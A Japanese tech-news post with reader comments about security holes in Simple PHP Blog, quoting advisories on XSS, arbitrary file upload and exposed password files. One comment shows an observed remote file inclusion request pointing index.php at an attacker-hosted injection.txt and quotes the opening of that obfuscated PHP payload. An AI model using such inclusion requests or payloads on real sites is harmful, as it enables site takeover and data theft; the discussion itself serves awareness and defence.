Simple PHP blogに深刻な脆弱性 8
ストーリー by hylom
あるAnonymous Coward 曰く、
yahoo!ウェブホスティング(ライトコース)からの注意喚起メールにて知ったのだが、Simple PHP Blogに深刻な脆弱性が発見されている。
この注意喚起メールによると、起こり得る事態としてがあるそうで、インストールしているだけでこのような事態が起こりうるとのこと。Simple PHP Blogのプロジェクトページにあたってみたが、特にそれに該当すると思われる記述は見当たらず、詳細はよく分からない。Yahoo!側から指示された対策はMovable Typeへの乗り換え。Yahoo!がSimple PHP Blogの導入支援を行っていたのはライトコースのみであり、このコースで契約するユーザー層への指示としては合理的であるとも思われる。
- 掲示板管理者権限奪取
- 情報漏えい
- サイト改ざん
- ファイル消去
- SPAM踏み台
- ウィルス感染
Simple PHP BlogはGPLで配布されているものであり、利用している人もいるだろう。対策が必要となるかもしれない。詳細情報などお持ちの方はコメントで補足してもらえるとありがたい。
これでしょうか。 (スコア:3, 参考になる)
http://www.securityfocus.com/archive/1/480569/30/30/threaded [securityfocus.com]
(a) Cross Site Scripting (XSS)
Mutiple reflected XSS have been found in the "\themes\\user_style.php" file.
(b) Arbitrary File Upload Vulnerability
Simple PHP Blog is prone to an arbitrary file upload flaw because the application fails to check the upload denied files.
In the file "upload_img_cgi.php" there's the following file content/extension check:
PHPはよく知りませんので、以上です。
がんばろう。と自分に言い聞かせる。
Re:これでしょうか。 (スコア:2, 参考になる)
先ほどのはWebページから辿れ、配布バージョンと比較した2007年のですし。
このソフトウェアって...
「安全なウェブサイトの作り方」(PDF英語版) [ipa.go.jp]
を届けてあげたらどうでしょう。ってぐらい、アレですね。
クラックする側にとっては"とっても"簡単な部類に必ず入りますね。きっと。
サイト証明ちょっとアレなのですが。
https://www.netsecurity.ne.jp/6_10110.html [netsecurity.ne.jp]
▽Simple PHP Blog---------------------------------------------------
Simple PHP Blogは、user_style.phpスクリプトがユーザ入力を適切にチェックしていないことが原因でクロスサイトスクリプティングを実行されるセキュリティホールが存在する。この問題が悪用されると、リモートの攻撃者にクッキーベースの認証資格証明を奪取される可能性がある。
2007/09/27 登録
危険度:中
影響を受けるバージョン:0.5.0.1未満
影響を受ける環境:UNIX、Linux、Windows
回避策:0.5.1以降へのバージョンアップ
https://netsecurity.data-hotel.net/6_4091.html [data-hotel.net]
▽ Simple PHP Blog---------------------------------------------------
Simple PHP Blogは、ユーザ資格証明をconfig/password.txtファイルにストアすることなどが原因で複数のセキュリティホールが存在する。この問題が悪用されると、リモートの攻撃者に暗号化されたユーザ名やパスワードといった機密情報を奪取されたり悪意あるファイルをアップロードされる可能性がある。 [更新]
2005/07/14 登録、2005/08/29 更新
危険度:中
影響を受けるバージョン:0.4.0
影響を受ける環境:UNIX、Linux、Windows
回避策:公表されていません
がんばろう。と自分に言い聞かせる。
それは Simple PHP Blog 0.5.1 で直った話 (スコア:1)
Simple PHP Blog の最新版 0.5.1 でも unpatched なもの (スコア:1)
[SA27359] Simple PHP Blog Multiple Vulnerabilities [secunia.com] (Secunia, 2007.10.24)
Re: (スコア:0)
index.phpに引数としてinjectorが置いてあるページを指定してアクセス。
何らかの情報を獲得しているようです。
#例 http://www.aaa.ccc.com/index.php?s=http://www.injection.com/injection.txt? 等
ちなみに、injection.txtの内容は以下の通りです。。
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
むかしつかってました。 (スコア:1)
早々に撤退した記憶があります。
検索してもYahooのサイトが多分上のほうに出てくるので、日本じゃそんなに人気ないかな。
海外だとどうなんだろう…?
同じくむかしつかってました。 (スコア:0)
当時RSS乗っ取りにやられた覚えがあります。また使ってみようかと思ってた矢先でした。
# 以下当時の感想なので古いかも
PHP3でも動きそうなPHP非推奨になった過去の機能を使ってるような感じな部分もあったし、
PHP5向けに書き直したらだいぶマシになるんじゃなかろうかなんて思う節も。